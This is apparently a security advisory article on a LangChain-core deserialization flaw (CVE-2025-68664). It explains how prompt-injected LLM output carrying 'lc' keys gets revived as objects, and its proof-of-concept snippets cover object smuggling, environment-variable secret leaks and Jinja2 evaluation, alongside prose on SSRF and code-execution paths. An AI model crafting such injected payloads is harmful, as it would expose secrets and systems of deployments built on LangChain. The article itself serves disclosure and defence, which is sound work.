A critical vulnerability in LangChain’s core library (CVE-2025-68664) allows attackers to exfiltrate sensitive environment variables and potentially execute code through deserialization flaws.
Discovered by a Cyata researcher and patched just before Christmas 2025, the issue affects one of the most popular AI frameworks, with hundreds of millions of downloads.
LangChain-core’s dumps() and dumpd() functions failed to escape user-controlled dictionaries containing the reserved ‘lc’ key, which marks internal serialized objects.
This led to deserialization of untrusted data (CWE-502) when LLM outputs or prompt injections influenced fields like additional_kwargs or response_metadata, triggering serialization-deserialization cycles in common flows such as event streaming, logging, and caching. A CNA-assigned CVSS score of 9.3 rates it Critical, with 12 vulnerable patterns identified, including astream_events(v1) and Runnable.astream_log().
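The core of the bug is that a plain dict carrying the reserved ‘lc’ key survives a dumps()/loads() round trip as if it were one of LangChain’s own serialized objects. Below is a minimal, hedged sketch of that behavior against an unpatched langchain-core (payload values are illustrative; exact handling varies by version):

```python
# Minimal sketch, assuming an unpatched langchain-core (< 0.3.81 / < 1.2.5);
# patched releases escape the nested dict instead of reviving it.
from langchain_core.load import dumps, loads
from langchain_core.messages import AIMessage

# Model output (or prompt-injected content) lands in additional_kwargs and
# happens to carry LangChain's reserved serialization envelope keys.
tainted = AIMessage(
    content="ok",
    additional_kwargs={
        "injected": {
            "lc": 1,
            "type": "constructor",
            "id": ["langchain", "schema", "messages", "HumanMessage"],
            "kwargs": {"content": "smuggled object"},
        }
    },
)

# Pre-patch, dumps() emits the nested 'lc' dict without escaping it...
blob = dumps(tainted)

# ...so a later loads() in an event-streaming, logging, or caching path
# revives it as a real object rather than returning the caller's plain dict.
restored = loads(blob)
print(type(restored.additional_kwargs["injected"]))  # HumanMessage on unpatched builds
```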
A Cyata security researcher uncovered the flaw during audits of AI trust boundaries, spotting the missing escape in serialization code after tracing deserialization sinks.
The flaw was reported via Huntr on December 4, 2025; LangChain acknowledged it the next day and published the advisory on December 24. Patches rolled out in langchain-core versions 0.3.81 and 1.2.5, which wrap ‘lc’-containing dicts and disable secrets_from_env by default. That option was previously enabled, allowing direct environment variable leaks. The team awarded a record $4,000 bounty.
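The secrets_from_env default matters because LangChain represents secrets as small ‘lc’ envelopes that the loader resolves at deserialization time. The hedged sketch below assumes pre-patch behavior, where loads() falls back to os.environ when a secret is not supplied in secrets_map; DEMO_API_KEY is a made-up variable used only for the demonstration:

```python
# Minimal sketch of the env-var resolution path, assuming a pre-patch
# langchain-core where secrets_from_env effectively defaulted to True.
import os
from langchain_core.load import loads

os.environ["DEMO_API_KEY"] = "hunter2"  # stand-in secret for the demo

# A "secret"-type envelope smuggled into serialized data. Pre-patch, the
# reviver falls back to os.environ when the key is not in secrets_map,
# so deserialization hands back the raw environment value.
payload = '{"lc": 1, "type": "secret", "id": ["DEMO_API_KEY"]}'
print(loads(payload))  # -> "hunter2" when the env fallback is enabled
```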
Attackers could craft prompts to instantiate allowlisted classes like ChatBedrockConverse from langchain_aws, triggering SSRF with environment variables in headers for exfiltration.
PromptTemplate enables Jinja2 rendering, opening the door to possible RCE if it is invoked post-deserialization. LangChain’s scale amplifies the risk: pepy.tech logs roughly 847M total downloads, and pypistats reports about 98M in the last month.
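To see why a revived PromptTemplate is risky, note that with template_format="jinja2" the template body is evaluated when the prompt is formatted. The benign sketch below (an assumption-laden illustration: it requires the jinja2 package, and recent langchain-core versions run templates in a sandboxed environment) only evaluates an arithmetic expression, but an attacker-controlled template invoked post-deserialization is the code-execution vector described above:

```python
# Benign illustration: a jinja2-format template executes expressions at
# format() time instead of being treated as literal text.
from langchain_core.prompts import PromptTemplate

tmpl = PromptTemplate.from_template("{{ 6 * 7 }}", template_format="jinja2")
print(tmpl.format())  # -> "42"
```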
Upgrade langchain-core immediately and verify dependencies like langchain-community. Treat LLM outputs as untrusted, audit deserialization in streaming and logging paths, and disable secret resolution unless inputs are verified. A parallel flaw hit LangChainJS (CVE-2025-68665), underscoring risks in agentic AI plumbing.
Organizations must inventory agent deployments for swift triage amid booming LLM app adoption.
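As a quick triage aid for the upgrade advice above, the sketch below checks the installed langchain-core against the patched floors cited in the advisory (0.3.81 and 1.2.5); the helper name and the conservative handling of other release lines are assumptions:

```python
# Hypothetical triage helper: flags a langchain-core install that predates
# the patched releases (0.3.81 on the 0.3 line, 1.2.5 on the 1.x line).
# Uses importlib.metadata from the standard library and the packaging module.
from importlib.metadata import PackageNotFoundError, version
from packaging.version import Version

PATCHED_FLOORS = {(0, 3): Version("0.3.81"), (1, 2): Version("1.2.5")}

def langchain_core_is_patched() -> bool:
    try:
        installed = Version(version("langchain-core"))
    except PackageNotFoundError:
        return True  # not installed, nothing to upgrade
    floor = PATCHED_FLOORS.get((installed.major, installed.minor))
    if floor is not None:
        return installed >= floor
    # Release lines not listed in the advisory: treat anything newer than
    # 1.2.5 as fixed and everything older as needing review (assumption).
    return installed >= Version("1.2.5")

print("patched" if langchain_core_is_patched() else "upgrade langchain-core now")
```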
